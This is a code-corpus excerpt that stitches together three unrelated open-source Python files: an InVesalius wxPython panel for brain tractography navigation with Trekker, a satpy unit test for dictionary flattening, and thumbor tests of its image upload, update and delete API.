except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
class TractographyPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.affine = None
self.affine_vtk = None
self.trekker = None
self.n_tracts = const.N_TRACTS
self.peel_depth = const.PEEL_DEPTH
self.view_tracts = False
self.seed_offset = const.SEED_OFFSET
self.seed_radius = const.SEED_RADIUS
self.sleep_nav = const.SLEEP_NAVIGATION
self.brain_opacity = const.BRAIN_OPACITY
self.brain_peel = None
self.brain_actor = None
self.n_peels = const.MAX_PEEL_DEPTH
self.p_old = np.array([[0., 0., 0.]])
self.tracts_run = None
self.trekker_cfg = const.TREKKER_CONFIG
self.nav_status = False
self.SetAutoLayout(1)
self.__bind_events()
# Button for import config coil file
tooltip = wx.ToolTip(_("Load FOD"))
btn_load = wx.Button(self, -1, _("FOD"), size=wx.Size(50, 23))
btn_load.SetToolTip(tooltip)
btn_load.Enable(1)
btn_load.Bind(wx.EVT_BUTTON, self.OnLinkFOD)
# self.btn_load = btn_load
# Save button for object registration
tooltip = wx.ToolTip(_(u"Load Trekker configuration parameters"))
btn_load_cfg = wx.Button(self, -1, _(u"Configure"), size=wx.Size(65, 23))
btn_load_cfg.SetToolTip(tooltip)
btn_load_cfg.Enable(1)
btn_load_cfg.Bind(wx.EVT_BUTTON, self.OnLoadParameters)
# self.btn_load_cfg = btn_load_cfg
# Button for creating new coil
tooltip = wx.ToolTip(_("Load brain visualization"))
btn_mask = wx.Button(self, -1, _("Brain"), size=wx.Size(50, 23))
btn_mask.SetToolTip(tooltip)
btn_mask.Enable(1)
btn_mask.Bind(wx.EVT_BUTTON, self.OnLinkBrain)
# self.btn_new = btn_new
# Button for creating new coil
tooltip = wx.ToolTip(_("Load anatomical labels"))
btn_act = wx.Button(self, -1, _("ACT"), size=wx.Size(50, 23))
btn_act.SetToolTip(tooltip)
btn_act.Enable(1)
btn_act.Bind(wx.EVT_BUTTON, self.OnLoadACT)
# self.btn_new = btn_new
# Create a horizontal sizer to represent button save
line_btns = wx.BoxSizer(wx.HORIZONTAL)
line_btns.Add(btn_load, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
line_btns.Add(btn_load_cfg, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
line_btns.Add(btn_mask, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
line_btns.Add(btn_act, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
# Change peeling depth
text_peel_depth = wx.StaticText(self, -1, _("Peeling depth (mm):"))
spin_peel_depth = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_peel_depth.Enable(1)
spin_peel_depth.SetRange(0, const.MAX_PEEL_DEPTH)
spin_peel_depth.SetValue(const.PEEL_DEPTH)
spin_peel_depth.Bind(wx.EVT_TEXT, partial(self.OnSelectPeelingDepth, ctrl=spin_peel_depth))
spin_peel_depth.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectPeelingDepth, ctrl=spin_peel_depth))
# Change number of tracts
text_ntracts = wx.StaticText(self, -1, _("Number tracts:"))
spin_ntracts = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_ntracts.Enable(1)
spin_ntracts.SetRange(1, 2000)
spin_ntracts.SetValue(const.N_TRACTS)
spin_ntracts.Bind(wx.EVT_TEXT, partial(self.OnSelectNumTracts, ctrl=spin_ntracts))
spin_ntracts.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectNumTracts, ctrl=spin_ntracts))
# Change seed offset for computing tracts
text_offset = wx.StaticText(self, -1, _("Seed offset (mm):"))
spin_offset = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc = 0.1)
spin_offset.Enable(1)
spin_offset.SetRange(0, 100.0)
spin_offset.SetValue(self.seed_offset)
spin_offset.Bind(wx.EVT_TEXT, partial(self.OnSelectOffset, ctrl=spin_offset))
spin_offset.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectOffset, ctrl=spin_offset))
# self.spin_offset = spin_offset
# Change seed radius for computing tracts
text_radius = wx.StaticText(self, -1, _("Seed radius (mm):"))
spin_radius = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.1)
spin_radius.Enable(1)
spin_radius.SetRange(0, 100.0)
spin_radius.SetValue(self.seed_radius)
spin_radius.Bind(wx.EVT_TEXT, partial(self.OnSelectRadius, ctrl=spin_radius))
spin_radius.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectRadius, ctrl=spin_radius))
# self.spin_radius = spin_radius
# Change sleep pause between navigation loops
text_sleep = wx.StaticText(self, -1, _("Sleep (s):"))
spin_sleep = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.01)
spin_sleep.Enable(1)
spin_sleep.SetRange(0.01, 10.0)
spin_sleep.SetValue(self.sleep_nav)
spin_sleep.Bind(wx.EVT_TEXT, partial(self.OnSelectSleep, ctrl=spin_sleep))
spin_sleep.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectSleep, ctrl=spin_sleep))
# Change opacity of brain mask visualization
text_opacity = wx.StaticText(self, -1, _("Brain opacity:"))
spin_opacity = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.1)
spin_opacity.Enable(0)
spin_opacity.SetRange(0, 1.0)
spin_opacity.SetValue(self.brain_opacity)
spin_opacity.Bind(wx.EVT_TEXT, partial(self.OnSelectOpacity, ctrl=spin_opacity))
spin_opacity.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectOpacity, ctrl=spin_opacity))
self.spin_opacity = spin_opacity
# Create a horizontal sizer to threshold configs
border = 1
line_peel_depth = wx.BoxSizer(wx.HORIZONTAL)
line_peel_depth.AddMany([(text_peel_depth, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_peel_depth, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_ntracts = wx.BoxSizer(wx.HORIZONTAL)
line_ntracts.AddMany([(text_ntracts, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_ntracts, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_offset = wx.BoxSizer(wx.HORIZONTAL)
line_offset.AddMany([(text_offset, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_offset, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_radius = wx.BoxSizer(wx.HORIZONTAL)
line_radius.AddMany([(text_radius, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_radius, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_sleep = wx.BoxSizer(wx.HORIZONTAL)
line_sleep.AddMany([(text_sleep, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_sleep, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_opacity = wx.BoxSizer(wx.HORIZONTAL)
line_opacity.AddMany([(text_opacity, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_opacity, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
# Check box to enable tract visualization
checktracts = wx.CheckBox(self, -1, _('Enable tracts'))
checktracts.SetValue(False)
checktracts.Enable(0)
checktracts.Bind(wx.EVT_CHECKBOX, partial(self.OnEnableTracts, ctrl=checktracts))
self.checktracts = checktracts
# Check box to enable surface peeling
checkpeeling = wx.CheckBox(self, -1, _('Peel surface'))
checkpeeling.SetValue(False)
checkpeeling.Enable(0)
checkpeeling.Bind(wx.EVT_CHECKBOX, partial(self.OnShowPeeling, ctrl=checkpeeling))
self.checkpeeling = checkpeeling
# Check box to enable tract visualization
checkACT = wx.CheckBox(self, -1, _('ACT'))
checkACT.SetValue(False)
checkACT.Enable(0)
checkACT.Bind(wx.EVT_CHECKBOX, partial(self.OnEnableACT, ctrl=checkACT))
self.checkACT = checkACT
border_last = 1
line_checks = wx.BoxSizer(wx.HORIZONTAL)
line_checks.Add(checktracts, 0, wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, border_last)
line_checks.Add(checkpeeling, 0, wx.ALIGN_CENTER | wx.RIGHT | wx.LEFT, border_last)
line_checks.Add(checkACT, 0, wx.RIGHT | wx.LEFT, border_last)
# Add line sizers into main sizer
border = 1
border_last = 10
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(line_btns, 0, wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, border_last)
main_sizer.Add(line_peel_depth, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_ntracts, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_offset, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_radius, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_sleep, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_opacity, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_checks, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP | wx.BOTTOM, border_last)
main_sizer.Fit(self)
self.SetSizer(main_sizer)
self.Update()
def __bind_events(self):
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.OnUpdateTracts, 'Set cross focal point')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
def OnSelectPeelingDepth(self, evt, ctrl):
self.peel_depth = ctrl.GetValue()
if self.checkpeeling.GetValue():
actor = self.brain_peel.get_actor(self.peel_depth)
Publisher.sendMessage('Update peel', flag=True, actor=actor)
def OnSelectNumTracts(self, evt, ctrl):
self.n_tracts = ctrl.GetValue()
# self.tract.n_tracts = ctrl.GetValue()
Publisher.sendMessage('Update number of tracts', data=self.n_tracts)
def OnSelectOffset(self, evt, ctrl):
self.seed_offset = ctrl.GetValue()
# self.tract.seed_offset = ctrl.GetValue()
Publisher.sendMessage('Update seed offset', data=self.seed_offset)
def OnSelectRadius(self, evt, ctrl):
self.seed_radius = ctrl.GetValue()
# self.tract.seed_offset = ctrl.GetValue()
Publisher.sendMessage('Update seed radius', data=self.seed_radius)
def OnSelectSleep(self, evt, ctrl):
self.sleep_nav = ctrl.GetValue()
# self.tract.seed_offset = ctrl.GetValue()
Publisher.sendMessage('Update sleep', data=self.sleep_nav)
def OnSelectOpacity(self, evt, ctrl):
self.brain_actor.GetProperty().SetOpacity(ctrl.GetValue())
Publisher.sendMessage('Update peel', flag=True, actor=self.brain_actor)
def OnShowPeeling(self, evt, ctrl):
# self.view_peeling = ctrl.GetValue()
if ctrl.GetValue():
actor = self.brain_peel.get_actor(self.peel_depth)
else:
actor = None
Publisher.sendMessage('Update peel', flag=ctrl.GetValue(), actor=actor)
def OnEnableTracts(self, evt, ctrl):
self.view_tracts = ctrl.GetValue()
Publisher.sendMessage('Update tracts visualization', data=self.view_tracts)
if not self.view_tracts:
Publisher.sendMessage('Remove tracts')
Publisher.sendMessage("Update marker offset state", create=False)
def OnEnableACT(self, evt, ctrl):
# self.view_peeling = ctrl.GetValue()
# if ctrl.GetValue():
# act_data = self.brain_peel.get_actor(self.peel_depth)
# else:
# actor = None
Publisher.sendMessage('Enable ACT', data=ctrl.GetValue())
def UpdateNavigationStatus(self, nav_status, vis_status):
self.nav_status = nav_status
def OnLinkBrain(self, event=None):
Publisher.sendMessage('Update status text in GUI', label=_("Busy"))
Publisher.sendMessage('Begin busy cursor')
mask_path = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, _("Import brain mask"))
img_path = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, _("Import T1 anatomical image"))
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# mask_file = 'Baran_brain_mask.nii'
# mask_path = os.path.join(data_dir, mask_file)
# img_file = 'Baran_T1_inFODspace.nii'
# img_path = os.path.join(data_dir, img_file)
if not self.affine_vtk:
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
self.affine = slic.affine.copy()
self.affine[1, -1] -= matrix_shape[1]
self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
try:
self.brain_peel = brain.Brain(img_path, mask_path, self.n_peels, self.affine_vtk)
self.brain_actor = self.brain_peel.get_actor(self.peel_depth)
self.brain_actor.GetProperty().SetOpacity(self.brain_opacity)
Publisher.sendMessage('Update peel', flag=True, actor=self.brain_actor)
self.checkpeeling.Enable(1)
self.checkpeeling.SetValue(True)
self.spin_opacity.Enable(1)
Publisher.sendMessage('Update status text in GUI', label=_("Brain model loaded"))
except:
wx.MessageBox(_("Unable to load brain mask."), _("InVesalius 3"))
Publisher.sendMessage('End busy cursor')
def OnLinkFOD(self, event=None):
Publisher.sendMessage('Update status text in GUI', label=_("Busy"))
Publisher.sendMessage('Begin busy cursor')
filename = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, msg=_("Import Trekker FOD"))
# Juuso
# data_dir = os.environ.get('OneDriveConsumer') + '\\data\\dti'
# FOD_path = 'sub-P0_dwi_FOD.nii'
# Baran
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# FOD_path = 'Baran_FOD.nii'
# filename = os.path.join(data_dir, FOD_path)
# if not self.affine_vtk:
# slic = sl.Slice()
# self.affine = slic.affine
# self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
if not self.affine_vtk:
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
self.affine = slic.affine.copy()
self.affine[1, -1] -= matrix_shape[1]
self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
# try:
self.trekker = Trekker.initialize(filename.encode('utf-8'))
self.trekker, n_threads = dti.set_trekker_parameters(self.trekker, self.trekker_cfg)
self.checktracts.Enable(1)
self.checktracts.SetValue(True)
self.view_tracts = True
Publisher.sendMessage('Update Trekker object', data=self.trekker)
Publisher.sendMessage('Update number of threads', data=n_threads)
Publisher.sendMessage('Update tracts visualization', data=1)
Publisher.sendMessage('Update status text in GUI', label=_("Trekker initialized"))
# except:
# wx.MessageBox(_("Unable to initialize Trekker, check FOD and config files."), _("InVesalius 3"))
Publisher.sendMessage('End busy cursor')
def OnLoadACT(self, event=None):
Publisher.sendMessage('Update status text in GUI', label=_("Busy"))
Publisher.sendMessage('Begin busy cursor')
filename = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, msg=_("Import anatomical labels"))
# Baran
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# act_path = 'Baran_trekkerACTlabels_inFODspace.nii'
# filename = os.path.join(data_dir, act_path)
act_data = nb.squeeze_image(nb.load(filename))
act_data = nb.as_closest_canonical(act_data)
act_data.update_header()
act_data_arr = act_data.get_fdata()
if not self.affine_vtk:
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
self.affine = slic.affine.copy()
self.affine[1, -1] -= matrix_shape[1]
self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
self.checkACT.Enable(1)
self.checkACT.SetValue(True)
Publisher.sendMessage('Update ACT data', data=act_data_arr)
Publisher.sendMessage('Enable ACT', data=True)
# Publisher.sendMessage('Create grid', data=act_data_arr, affine=self.affine)
# Publisher.sendMessage('Update number of threads', data=n_threads)
# Publisher.sendMessage('Update tracts visualization', data=1)
Publisher.sendMessage('Update status text in GUI', label=_("Trekker ACT loaded"))
Publisher.sendMessage('End busy cursor')
def OnLoadParameters(self, event=None):
import json
filename = dlg.ShowLoadSaveDialog(message=_(u"Load Trekker configuration"),
wildcard=_("JSON file (*.json)|*.json"))
try:
# Check if filename exists, read the JSON file and check if all parameters match
# with the required list defined in the constants module
# if a parameter is missing, raise an error
if filename:
with open(filename) as json_file:
self.trekker_cfg = json.load(json_file)
assert all(name in self.trekker_cfg for name in const.TREKKER_CONFIG)
if self.trekker:
self.trekker, n_threads = dti.set_trekker_parameters(self.trekker, self.trekker_cfg)
Publisher.sendMessage('Update Trekker object', data=self.trekker)
Publisher.sendMessage('Update number of threads', data=n_threads)
Publisher.sendMessage('Update status text in GUI', label=_("Trekker config loaded"))
except (AssertionError, json.decoder.JSONDecodeError):
# Inform user that file is not compatible
self.trekker_cfg = const.TREKKER_CONFIG
wx.MessageBox(_("File incompatible, using default configuration."), _("InVesalius 3"))
Publisher.sendMessage('Update status text in GUI', label="")
def OnUpdateTracts(self, position):
"""
Minimal working version of tract computation. Updates when cross sends Pubsub message to update.
Position refers to the coordinates in InVesalius 2D space. To represent the same coordinates in the 3D space,
flip_x the coordinates and multiply the z coordinate by -1. This is all done in the flix_x function.
:param arg: event for pubsub
:param position: list or array with the x, y, and z coordinates in InVesalius space
"""
# Minimal working version of tract computation
# It updates when cross updates
# pass
if self.view_tracts and not self.nav_status:
# print("Running during navigation")
coord_flip = list(position[:3])
coord_flip[1] = -coord_flip[1]
dti.compute_tracts(self.trekker, coord_flip, self.affine, self.affine_vtk,
self.n_tracts)
def OnCloseProject(self):
self.checktracts.SetValue(False)
self.checktracts.Enable(0)
self.checkpeeling.SetValue(False)
self.checkpeeling.Enable(0)
self.checkACT.SetValue(False)
self.checkACT.Enable(0)
self.spin_opacity.SetValue(const.BRAIN_OPACITY)
self.spin_opacity.Enable(0)
Publisher.sendMessage('Update peel', flag=False, actor=self.brain_actor)
self.peel_depth = const.PEEL_DEPTH
self.n_tracts = const.N_TRACTS
Publisher.sendMessage('Remove tracts')
class QueueCustom(queue.Queue):
"""
A custom queue subclass that provides a :meth:`clear` method.
https://stackoverflow.com/questions/6517953/clear-all-items-from-the-queue
Modified to a LIFO Queue type (Last-in-first-out). Seems to make sense for the navigation
threads, as the last added coordinate should be the first to be processed.
In the first tests in a short run, seems to increase the coord queue size considerably,
possibly limiting the queue size is good.
"""
def clear(self):
"""
Clears all items from the queue.
"""
with self.mutex:
unfinished = self.unfinished_tasks - len(self.queue)
if unfinished <= 0:
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.all_tasks_done.notify_all()
self.unfinished_tasks = unfinished
self.queue.clear()
self.not_full.notify_all()
class UpdateNavigationScene(threading.Thread):
def __init__(self, vis_queues, vis_components, event, sle):
"""Class (threading) to update the navigation scene with all graphical elements.
Sleep function in run method is used to avoid blocking GUI and more fluent, real-time navigation
:param affine_vtk: Affine matrix in vtkMatrix4x4 instance to update objects position in 3D scene
:type affine_vtk: vtkMatrix4x4
:param visualization_queue: Queue instance that manage coordinates to be visualized
:type visualization_queue: queue.Queue
:param event: Threading event to coordinate when tasks as done and allow UI release
:type event: threading.Event
:param sle: Sleep pause in seconds
:type sle: float
"""
threading.Thread.__init__(self, name='UpdateScene')
self.trigger_state, self.view_tracts = vis_components
self.coord_queue, self.trigger_queue, self.tracts_queue, self.icp_queue = vis_queues
self.sle = sle
self.event = event
def run(self):
# count = 0
while not self.event.is_set():
got_coords = False
try:
coord, m_img, view_obj = self.coord_queue.get_nowait()
got_coords = True
# print('UpdateScene: get {}'.format(count))
# use of CallAfter is mandatory otherwise crashes the wx interface
if self.view_tracts:
bundle, affine_vtk, coord_offset = self.tracts_queue.get_nowait()
#TODO: Check if possible to combine the Remove tracts with Update tracts in a single command
wx.CallAfter(Publisher.sendMessage, 'Remove tracts')
wx.CallAfter(Publisher.sendMessage, 'Update tracts', root=bundle,
affine_vtk=affine_vtk, coord_offset=coord_offset)
# wx.CallAfter(Publisher.sendMessage, 'Update marker offset', coord_offset=coord_offset)
self.tracts_queue.task_done()
if self.trigger_state:
trigger_on = self.trigger_queue.get_nowait()
if trigger_on:
wx.CallAfter(Publisher.sendMessage, 'Create marker')
self.trigger_queue.task_done()
#TODO: If using the view_tracts substitute the raw coord from the offset coordinate, so the user
# see the red cross in the position of the offset marker
wx.CallAfter(Publisher.sendMessage, 'Update slices position', position=coord[:3])
wx.CallAfter(Publisher.sendMessage, 'Set cross focal point', position=coord)
wx.CallAfter(Publisher.sendMessage, 'Update slice viewer')
if view_obj:
wx.CallAfter(Publisher.sendMessage, 'Update object matrix', m_img=m_img, coord=coord)
self.coord_queue.task_done()
# print('UpdateScene: done {}'.format(count))
# count += 1
sleep(self.sle)
except queue.Empty:
if got_coords:
self.coord_queue.task_done()
class InputAttributes(object):
# taken from https://stackoverflow.com/questions/2466191/set-attributes-from-dictionary-in-python
def __init__(self, *initial_data, **kwargs):
for dictionary in initial_data:
for key in dictionary:
setattr(self, key, dictionary[key])
for key in kwargs:
setattr(self, key, kwargs[key])
| gpl-2.0 | 275,369,215,335,656,960 | 44.27114 | 194 | 0.588407 | false |
pytroll/satpy | satpy/tests/writer_tests/test_utils.py | 1 | 1241 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2019 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Tests for writer utilities."""
import unittest
import satpy.writers.utils as wutils
class WriterUtilsTest(unittest.TestCase):
"""Test various writer utilities."""
def test_flatten_dict(self):
"""Test dictionary flattening."""
d = {'a': 1, 'b': {'c': 1, 'd': {'e': 1, 'f': {'g': [1, 2]}}}}
expected = {'a': 1,
'b_c': 1,
'b_d_e': 1,
'b_d_f_g': [1, 2]}
self.assertDictEqual(wutils.flatten_dict(d), expected)
| gpl-3.0 | 2,265,708,713,553,989,400 | 35.5 | 79 | 0.644641 | false |
okor/thumbor | tests/handlers/test_upload_api.py | 3 | 14343 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com [email protected]
from shutil import rmtree
import tempfile
import re
from preggy import expect
from thumbor.config import Config
from thumbor.importer import Importer
from thumbor.context import Context
from tests.base import TestCase
from tests.fixtures.images import (
valid_image, valid_image_path,
too_small_image, too_small_image_path,
too_heavy_image
)
class UploadTestCase(TestCase):
@classmethod
def setUpClass(cls, *args, **kw):
cls.root_path = tempfile.mkdtemp()
cls.base_uri = "/image"
@classmethod
def tearDownClass(cls, *args, **kw):
rmtree(cls.root_path)
@property
def upload_storage(self):
return self.context.modules.upload_photo_storage
def get_path_from_location(self, location):
return "/".join(
location.lstrip('/').rstrip('/').split('/')[1:-1]
)
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = False
cfg.UPLOAD_PUT_ALLOWED = False
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
class UploadAPINewFileTestCase(UploadTestCase):
def test_can_post_image_with_content_type(self):
filename = 'new_image_with_a_filename.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg', 'Slug': filename}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_image_with_charset(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg;charset=UTF-8'}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_image_with_unknown_charset(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/thisIsAUnknwonOrBadlyFormedCHarset'}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_image_without_filename(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_from_html_form(self):
filename = 'crocodile2.jpg'
image = ('media', filename, valid_image())
response = self.post_files(self.base_uri, {'Slug': 'another_filename.jpg'}, (image, ))
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
class UploadAPIUpdateFileTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = False
cfg.UPLOAD_PUT_ALLOWED = True
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_can_modify_existing_image(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, too_small_image())
expect(response.code).to_equal(204)
id_should_exist = re.compile(self.base_uri + r'/([^\/]{32})/' + filename).search(location).group(1)
expected_path = self.upload_storage.path_on_filesystem(id_should_exist)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(too_small_image_path)
id_shouldnt_exist = re.compile(self.base_uri + r'/(.*)').search(location).group(1)
expected_path = self.upload_storage.path_on_filesystem(id_shouldnt_exist)
expect(expected_path).not_to_exist()
class UploadAPIUpdateSmallIdFileTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = False
cfg.UPLOAD_PUT_ALLOWED = True
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
cfg.MAX_ID_LENGTH = 36
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_cant_get_truncated_id_when_stored_with_large_id(self):
image_id = 'e5bcf126-791b-4375-9f73-925ab8b9fb5f'
path = '/image/%s' % image_id
response = self.put(path, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(204)
response = self.get(path[:7 + 32], {'Accept': 'image/jpeg'})
expect(response.code).to_equal(404)
def test_can_get_actual_id_when_stored_with_large_id(self):
path = '/image/e5bcf126-791b-4375-9f73-925ab8b9fb5g'
self.put(path, {'Content-Type': 'image/jpeg'}, valid_image())
response = self.get(path + '123456', {'Accept': 'image/jpeg'})
expect(response.code).to_equal(200)
expect(response.body).to_be_similar_to(valid_image())
class UploadAPIDeleteTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = True
cfg.UPLOAD_PUT_ALLOWED = False
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_can_delete_existing_image(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
image_id = re.compile(self.base_uri + r'/([^\/]{32})/' + filename).search(location).group(1)
image_location = self.upload_storage.path_on_filesystem(image_id)
expect(image_location).to_exist()
response = self.delete(location, {})
expect(response.code).to_equal(204)
expect(image_location).not_to_exist()
def test_deleting_unknown_image_returns_not_found(self):
